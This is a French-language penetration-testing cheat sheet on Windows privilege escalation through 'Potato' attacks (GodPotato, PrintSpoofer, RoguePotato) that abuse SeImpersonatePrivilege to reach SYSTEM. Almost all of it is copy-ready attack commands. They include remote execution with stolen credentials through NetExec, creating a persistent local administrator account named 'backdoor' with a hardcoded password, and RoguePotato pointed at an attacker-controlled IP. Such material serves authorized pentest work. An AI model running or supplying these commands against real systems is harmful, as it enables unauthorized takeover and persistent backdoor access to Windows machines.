Windows Privilege Escalation

Potato Attacks

GodPotato, PrintSpoofer et RoguePotato pour escalader SeImpersonatePrivilege vers SYSTEM.

Identification des privilèges

Copy command
whoami /priv

Description: Lister les privilèges du token courant : identifier SeImpersonatePrivilege ou SeAssignPrimaryTokenPrivilege.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'whoami /priv'

Description: Vérifier les privilèges à distance : SeImpersonate présent sur la plupart des comptes de service.

GodPotato

Copy command
GodPotato.exe -cmd 'whoami'

Description: GodPotato : exploitation de SeImpersonatePrivilege, compatible Windows Server 2012-2022.

Copy command
GodPotato.exe -cmd 'net user backdoor Pass123! /add && net localgroup administrators backdoor /add'

Description: Créer un admin local via GodPotato : accès SYSTEM pour ajout de compte persistant.

PrintSpoofer & RoguePotato

Copy command
PrintSpoofer.exe -i -c cmd

Description: PrintSpoofer : escalade SeImpersonate vers SYSTEM via le Spooler (Windows 10/Server 2019).

Copy command
RoguePotato.exe -r $ATTACKER_IP -e 'whoami' -l 9999

Description: RoguePotato : alternative à JuicyPotato pour les environnements sans DCOM accessible.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'C:\Temp\PrintSpoofer.exe -c "net user backdoor Pass123! /add"'

Description: Lancer PrintSpoofer à distance via NXC pour créer un admin sans session interactive.